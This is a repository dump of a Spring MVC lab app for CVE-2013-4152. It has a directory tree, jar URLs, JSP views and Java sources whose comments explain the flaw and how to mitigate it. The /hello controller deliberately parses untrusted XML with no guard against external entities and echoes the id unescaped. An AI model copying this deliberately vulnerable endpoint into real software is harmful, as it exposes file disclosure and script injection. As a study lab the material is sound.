maven-compiler-plugin │ └── compile │ └── default-compile │ ├── createdFiles.lst │ └── inputFiles.lst ├── README.md └── SpringConfigTest ├── SpringConfigTest.iml ├── out └── artifacts │ └── SpringConfigTest_war_exploded │ ├── META-INF │ └── MANIFEST.MF │ ├── WEB-INF │ ├── classes │ │ ├── invoker-client.xml │ │ ├── invoker-dispatcher-servlet.xml │ │ ├── org │ │ │ ├── example │ │ │ │ ├── Controller │ │ │ │ │ ├── Client.class │ │ │ │ │ └── TestController.class │ │ │ │ └── User │ │ │ │ │ ├── IUserService.class │ │ │ │ │ ├── User.class │ │ │ │ │ ├── UserService.class │ │ │ │ │ └── UserServiceImpl.class │ │ │ └── sglab │ │ │ │ └── vuln │ │ │ │ ├── entity │ │ │ │ ├── Message.class │ │ │ │ └── User.class │ │ │ │ └── service │ │ │ │ ├── IUserService.class │ │ │ │ └── Impl │ │ │ 
│ └── UserServiceImpl.class │ │ └── spring │ │ │ ├── invoker-client.xml │ │ │ └── spring-remote.xml │ └── web.xml │ ├── index.jsp │ └── resources │ ├── invoker-client.xml │ ├── invoker-dispatcher-servlet.xml │ └── spring │ ├── invoker-client.xml │ └── spring-remote.xml ├── pom.xml ├── src └── org │ └── example │ ├── Controller │ └── TestController.java │ ├── User │ ├── Client.java │ ├── IUserService.java │ ├── User.java │ └── UserServiceImpl.java │ └── Validate │ ├── CaseMode.java │ ├── CheckCase.java │ └── CheckCaseValidator.java └── web ├── WEB-INF ├── jsp │ └── user.jsp └── web.xml ├── index.jsp └── resources ├── invoker-client.xml ├── invoker-dispatcher-servlet.xml └── spring-mvc.xml /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/JaxbController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/JaxbController.class -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/Mapper.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/Mapper.class -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/Order.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/Order.class -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/Settings.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/Settings.class -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/User.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/classes/org/example/jaxb/User.class -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/jsp/hello.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | Created by IntelliJ IDEA. 3 | User: dxy 4 | Date: 2022/12/12 5 | Time: 6:33 下午 6 | To change this template use File | Settings | File Templates. 7 | --%> 8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %> 9 | 10 | 11 | hello 12 | 13 | 14 | ${message} 15 | 16 | 17 | -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/jsp/test.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | Created by IntelliJ IDEA. 
3 | User: dxy 4 | Date: 2022/12/19 5 | Time: 4:58 下午 6 | To change this template use File | Settings | File Templates. 7 | --%> 8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %> 9 | 10 | 11 | Title 12 | 13 | 14 | ${test} 15 | 16 | 17 | -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/commons-fileupload-1.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/commons-fileupload-1.2.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/commons-logging-1.1.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/commons-logging-1.1.1.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/jstl-1.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/jstl-1.2.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-aop-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-aop-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-aspects-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-aspects-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-beans-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-beans-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-build-src-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-build-src-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-context-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-context-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-context-support-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-context-support-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-core-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-core-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-data-commons-1.5.0.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-data-commons-1.5.0.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-data-jpa-1.5.0.RELEASE.jar: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-data-jpa-1.5.0.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-expression-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-expression-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-instrument-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-instrument-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-instrument-tomcat-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-instrument-tomcat-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-jdbc-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-jdbc-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-jms-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-jms-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-orm-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-orm-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-oxm-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-oxm-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-struts-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-struts-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-test-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-test-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-tx-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-tx-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-web-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-web-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-webmvc-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-webmvc-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-webmvc-portlet-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/spring-webmvc-portlet-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/standard.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/standard.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xml-apis-1.4.01.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xml-apis-1.4.01.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xml-resolver-1.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xml-resolver-1.2.jar 
-------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xmlpull-1.1.3.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xmlpull-1.1.3.1.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xmlschema-core-2.2.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xmlschema-core-2.2.1.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xpp3_min-1.1.4c.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xpp3_min-1.1.4c.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xstream-1.4.6.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/lib/xstream-1.4.6.jar -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 
CVE-2013-4152 8 | 9 | spring 10 | 11 | org.springframework.web.servlet.DispatcherServlet 12 | 13 | 1 14 | 15 | 16 | spring 17 | / 18 | 19 | 20 | 21 | index.jsp 22 | 23 | -------------------------------------------------------------------------------- /CVE-2013-4152/out/artifacts/CVE_2013_4152_war_exploded/index.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | Created by IntelliJ IDEA. 3 | User: dxy 4 | Date: 2022/12/20 5 | Time: 3:29 下午 6 | To change this template use File | Settings | File Templates. 7 | --%> 8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %> 9 | 10 | 11 | $Title$ 12 | 13 | 14 | CVE-2013-4152 15 | 16 | 17 | -------------------------------------------------------------------------------- /CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/JaxbController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/JaxbController.class -------------------------------------------------------------------------------- /CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/Mapper.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/Mapper.class -------------------------------------------------------------------------------- /CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/Order.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/Order.class 
--------------------------------------------------------------------------------
/CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/Settings.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/Settings.class
--------------------------------------------------------------------------------
/CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/User.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/out/production/CVE-2013-4152/org/example/jaxb/User.class
--------------------------------------------------------------------------------
/CVE-2013-4152/src/org/example/jaxb/JaxbController.java:
--------------------------------------------------------------------------------
package org.example.jaxb;

import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;

/**
 * Spring MVC controller for the CVE-2013-4152 lab application.
 *
 * <p>Exposes a single endpoint, {@code POST /hello}, that accepts an
 * {@code application/xml} body and lets the framework bind it to {@link Order}.
 *
 * <p>Security notes for reviewers:
 * <ul>
 *   <li>The request body is untrusted XML and is unmarshalled by the framework before
 *       the handler runs. Nothing in this class restricts DTDs or external entities, so
 *       whether they are resolved depends on the Spring version and message-converter
 *       configuration in use (the listing bundles spring-*-3.2.4.RELEASE jars;
 *       TODO confirm against the advisory's affected range).</li>
 *   <li>The mitigation therefore lives outside this class: run a fixed Spring release
 *       and make sure the XML parser behind the converter has DTD and external-entity
 *       processing disabled.</li>
 *   <li>For detection, inbound XML bodies that carry a DOCTYPE declaration are worth
 *       logging or rejecting at the edge; this endpoint has no legitimate need for one.</li>
 *   <li>The parsed id is copied into the model and printed by hello.jsp as
 *       {@code ${message}}; presumably unescaped, so it should be output-encoded
 *       (for example with JSTL {@code <c:out>}) - verify against the JSP source.</li>
 * </ul>
 */
@Controller
public class JaxbController {
    /**
     * Handles {@code POST /hello}: prints the order id to stdout and exposes it to the view.
     *
     * @param order request body bound from XML by Spring; its content is client-controlled
     * @param model view model; receives the id under the key {@code "message"}
     * @return the view name {@code "/hello"}
     */
    @RequestMapping(value = "/hello", method = RequestMethod.POST, consumes = "application/xml")
    public String Order(@RequestBody Order order,Model model) {
        System.out.println("got Order");
        // Client-supplied value written to stdout as-is; a real service would use a logger
        // and neutralise line breaks before logging it.
        System.out.println(order.getId());
        // Same value handed to the view without validation or encoding.
        model.addAttribute("message", order.getId());
        return "/hello";
    }

    // post poc.xml to /hello
}

--------------------------------------------------------------------------------
/CVE-2013-4152/src/org/example/jaxb/Order.java:
--------------------------------------------------------------------------------
package org.example.jaxb;

import javax.xml.bind.annotation.XmlElement;
import javax.xml.bind.annotation.XmlRootElement;

/**
 * JAXB-bound payload type for the {@code /hello} endpoint: root element {@code Order}
 * with a single {@code id} property.
 *
 * <p>The id is a free-form string; no length or character validation is applied here.
 */
@XmlRootElement(name="Order")
public class Order {
    // Value of the id element as supplied in the XML document.
    private String id;

    /** Returns the id read from the XML body, or {@code null} if it was never set. */
    public String getId() {
        return id;
    }

    /** Sets the id; annotated with {@code @XmlElement} so JAXB maps the property. */
    @XmlElement
    public void setId(String id) {
        this.id = id;
    }
}


--------------------------------------------------------------------------------
/CVE-2013-4152/src/org/example/jaxb/Settings.java:
--------------------------------------------------------------------------------
package org.example.jaxb;

/**
 * Plain bean holding one boolean flag. It carries no JAXB annotations and is not
 * referenced by JaxbController or Order in this listing.
 */
public class Settings {
    private boolean fooEnabled;

    /** Returns the current value of the flag. */
    public boolean isFooEnabled() {
        return fooEnabled;
    }

    /** Sets the flag. */
    public void setFooEnabled(boolean fooEnabled) {
        this.fooEnabled = fooEnabled;
    }
}

--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/jsp/hello.jsp:
--------------------------------------------------------------------------------
1 | <%-- 2 | Created by IntelliJ IDEA. 3 | User: dxy 4 | Date: 2022/12/12 5 | Time: 6:33 下午 6 | To change this template use File | Settings | File Templates. 7 | --%> 8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %> 9 | 10 | 11 | hello 12 | 13 | 14 | ${message} 15 | 16 | 17 |
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/jsp/test.jsp:
--------------------------------------------------------------------------------
1 | <%-- 2 | Created by IntelliJ IDEA. 3 | User: dxy 4 | Date: 2022/12/19 5 | Time: 4:58 下午 6 | To change this template use File | Settings | File Templates.
7 | --%> 8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %> 9 | 10 | 11 | Title 12 | 13 | 14 | ${test} 15 | 16 | 17 | -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/commons-fileupload-1.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/commons-fileupload-1.2.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/commons-logging-1.1.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/commons-logging-1.1.1.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/jstl-1.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/jstl-1.2.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-aop-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-aop-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-aspects-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-aspects-3.2.4.RELEASE.jar 
-------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-beans-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-beans-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-build-src-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-build-src-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-context-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-context-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-context-support-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-context-support-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-core-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-core-3.2.4.RELEASE.jar 
-------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-data-commons-1.5.0.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-data-commons-1.5.0.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-data-jpa-1.5.0.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-data-jpa-1.5.0.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-expression-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-expression-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-instrument-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-instrument-3.2.4.RELEASE.jar -------------------------------------------------------------------------------- /CVE-2013-4152/web/WEB-INF/lib/spring-instrument-tomcat-3.2.4.RELEASE.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-instrument-tomcat-3.2.4.RELEASE.jar 
